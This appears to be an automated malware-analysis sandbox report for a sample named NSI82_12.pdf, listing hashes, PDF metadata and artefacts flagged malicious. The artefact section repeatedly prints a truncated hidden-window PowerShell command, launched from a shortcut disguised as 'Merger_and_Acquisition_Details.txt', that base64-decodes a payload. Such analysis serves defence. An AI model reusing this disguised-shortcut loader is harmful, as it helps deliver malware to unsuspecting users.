Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
bec053796102aace66437c22db744908
Sha1
55d4aaef34e3a7c59f2252180b28bdb383651ed3
Sha256
92d8996dca7f85e9800bdacf8b2286c7c43e791edcb503cc92c40e129c270213
Sha384
9f9686f8e3a33232ecde01f23668ac9c25df5566eca8d1cf37e7c53df01fbd7b261edd4cfed819296066073a99afc1b0
Sha512
f7afdfd60837cdde5337db28a45278b60c15afb570541f01abba0f5608cad555588a4cb17afe921eb90e84deb7ac4323379aa2cd29231cb646bba53f8493a3ce
SSDeep
768:MXCKcrDS6gvS5DRf2Sk3pFR5CvefIqS/uSlmvb846u4/RDKz8e7Qge8aHxSa0CPy:MXCLVDtIPCmf50IIt8j7QgePSJUlamSb
TLSH
4E5302D1CC65264E9B4F075FD9C6E8AEC9303A9B7A830EBC0DC72285434A4E44FA13D9
Information
Name
Value
NSI82_12.pdf

1.7

NSI82_12.pdf

Wins Upgrade

NSI82_12.pdf

D:20251204082245-05'00'

NSI82_12.pdf

WPS Writer

NSI82_12.pdf

NSI82_12.pdf

D:20251204082302-05'00'

NSI82_12.pdf

NSI82_12.pdf

NSI82_12.pdf

NSI82_12.pdf

Wins Upgrade

NSI82_12.pdf

NSI82_12.pdf

NSI82_12.pdf

D:20251204082245-05'00'

NSI82_12.pdf

WPS Writer

NSI82_12.pdf

NSI82_12.pdf

D:20251204082302-05'00'

NSI82_12.pdf

NSI82_12.pdf

D:20251204082245-05'00'

NSI82_12.pdf

NSI82_12.pdf

Artefacts
Name
Value
LNK: Command Execution

powershell.exe -WindowStyle hidden -NoExit -Command "$9023ZOC94U4RX = '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';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt

Deobfuscated PowerShell

-windowstyle "hidden" -NoExit -Command "$9023ZOC94U4RX = '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';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt"

Deobfuscated PowerShell

-windowstyle "hidden" -NoExit -Command "$9023ZOC94U4RX = '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';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt"

bec053796102aace66437c22db744908 (65.15 KB)
No malware configuration was found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

powershell.exe -WindowStyle hidden -NoExit -Command "$9023ZOC94U4RX = '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';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt

Malicious

bec053796102aace66437c22db744908 > Merger_and_Acquisition_Details > Merger_and_Acquisition_Details.txt.lnk

Deobfuscated PowerShell

-windowstyle "hidden" -NoExit -Command "$9023ZOC94U4RX = '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';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt"

Malicious

bec053796102aace66437c22db744908 > Merger_and_Acquisition_Details > Merger_and_Acquisition_Details.txt.lnk > LNK CommandLine

Deobfuscated PowerShell

-windowstyle "hidden" -NoExit -Command "$9023ZOC94U4RX = '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';$NGH7J6L3YP7X = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($9023ZOC94U4RX.Substring(26)));$vnYjTQtKh = 25 + 18;$vnYjTQt"

Malicious

bec053796102aace66437c22db744908 > Merger_and_Acquisition_Details > Merger_and_Acquisition_Details.txt.lnk > LNK CommandLine > [Deobfuscated PS]
